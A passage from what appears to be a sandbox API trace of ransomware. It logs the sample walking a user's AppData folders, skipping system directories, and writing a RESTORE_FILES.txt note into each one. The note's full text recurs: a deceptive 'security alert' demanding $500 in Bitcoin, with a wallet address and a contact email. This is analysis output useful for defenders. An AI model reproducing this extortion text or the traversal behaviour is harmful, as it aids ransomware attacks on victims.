E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.127] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0090.128] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.128] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0090.128] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.128] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0090.128] CloseHandle (hObject=0x150) returned 1 [0090.128] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0090.128] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0090.128] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\RESTORE_FILES.txt") returned 104 [0090.128] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0090.129] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.129] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0090.130] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.130] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0090.130] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.130] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0090.130] CloseHandle (hObject=0x14c) returned 1 [0090.131] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0090.131] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0090.131] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\RESTORE_FILES.txt") returned 95 [0090.131] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0090.141] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.141] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0090.141] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.141] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0090.141] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.141] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0090.142] CloseHandle (hObject=0xd8) returned 1 [0090.142] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0090.142] lstrcmpiW (lpString1="MMC", lpString2="Windows") returned -1 [0090.142] lstrcmpiW (lpString1="MMC", lpString2="Program Files") returned -1 [0090.142] lstrcmpiW (lpString1="MMC", lpString2="Program Files (x86)") returned -1 [0090.142] lstrcmpiW (lpString1="MMC", lpString2="$Recycle.bin") returned 1 [0090.142] lstrcmpiW (lpString1="MMC", lpString2="System Volume Information") returned -1 [0090.142] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC") returned 63 [0090.142] lstrcmpW (lpString1="MMC", lpString2=".") returned 1 [0090.142] lstrcmpW (lpString1="MMC", lpString2="..") returned 1 [0090.142] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\*") returned 65 [0090.142] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0090.142] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.142] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.142] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.142] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.142] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.142] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\.") returned 65 [0090.142] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.143] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.143] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.143] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.143] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.143] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.143] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.143] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\..") returned 66 [0090.143] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.143] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.143] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0090.143] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0090.143] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\RESTORE_FILES.txt") returned 81 [0090.143] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\mmc\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0090.143] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.143] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0090.144] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.144] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0090.144] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.144] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0090.144] CloseHandle (hObject=0xd8) returned 1 [0090.144] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0090.144] lstrcmpiW (lpString1="MS Project", lpString2="Windows") returned -1 [0090.144] lstrcmpiW (lpString1="MS Project", lpString2="Program Files") returned -1 [0090.144] lstrcmpiW (lpString1="MS Project", lpString2="Program Files (x86)") returned -1 [0090.144] lstrcmpiW (lpString1="MS Project", lpString2="$Recycle.bin") returned 1 [0090.144] lstrcmpiW (lpString1="MS Project", lpString2="System Volume Information") returned -1 [0090.144] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project") returned 70 [0090.144] lstrcmpW (lpString1="MS Project", lpString2=".") returned 1 [0090.145] lstrcmpW (lpString1="MS Project", lpString2="..") returned 1 [0090.145] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\*") returned 72 [0090.145] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0090.145] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.145] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.145] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.145] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.145] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.145] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\.") returned 72 [0090.145] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.146] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.146] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.146] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.146] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.146] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.146] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.146] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\..") returned 73 [0090.146] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.146] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.146] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.146] lstrcmpiW (lpString1="14", lpString2="Windows") returned -1 [0090.146] lstrcmpiW (lpString1="14", lpString2="Program Files") returned -1 [0090.146] lstrcmpiW (lpString1="14", lpString2="Program Files (x86)") returned -1 [0090.146] lstrcmpiW (lpString1="14", lpString2="$Recycle.bin") returned 1 [0090.146] lstrcmpiW (lpString1="14", lpString2="System Volume Information") returned -1 [0090.146] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14") returned 73 [0090.146] lstrcmpW (lpString1="14", lpString2=".") returned 1 [0090.146] lstrcmpW (lpString1="14", lpString2="..") returned 1 [0090.146] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\*") returned 75 [0090.146] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0090.147] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.147] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.147] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.147] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.147] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.147] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\.") returned 75 [0090.147] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.147] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.147] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.147] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.147] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.147] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.147] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.147] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\..") returned 76 [0090.147] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.147] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.147] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.147] lstrcmpiW (lpString1="1033", lpString2="Windows") returned -1 [0090.147] lstrcmpiW (lpString1="1033", lpString2="Program Files") returned -1 [0090.147] lstrcmpiW (lpString1="1033", lpString2="Program Files (x86)") returned -1 [0090.147] lstrcmpiW (lpString1="1033", lpString2="$Recycle.bin") returned 1 [0090.148] lstrcmpiW (lpString1="1033", lpString2="System Volume Information") returned -1 [0090.148] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033") returned 78 [0090.148] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0090.148] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0090.148] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\*") returned 80 [0090.148] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0090.149] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.149] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.149] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.149] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.149] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.149] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\.") returned 80 [0090.149] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.149] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.149] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.149] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.149] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.149] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.149] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.150] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\..") returned 81 [0090.150] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.150] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.150] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.150] lstrcmpiW (lpString1="Global.MPT", lpString2="Windows") returned -1 [0090.150] lstrcmpiW (lpString1="Global.MPT", lpString2="Program Files") returned -1 [0090.150] lstrcmpiW (lpString1="Global.MPT", lpString2="Program Files (x86)") returned -1 [0090.150] lstrcmpiW (lpString1="Global.MPT", lpString2="$Recycle.bin") 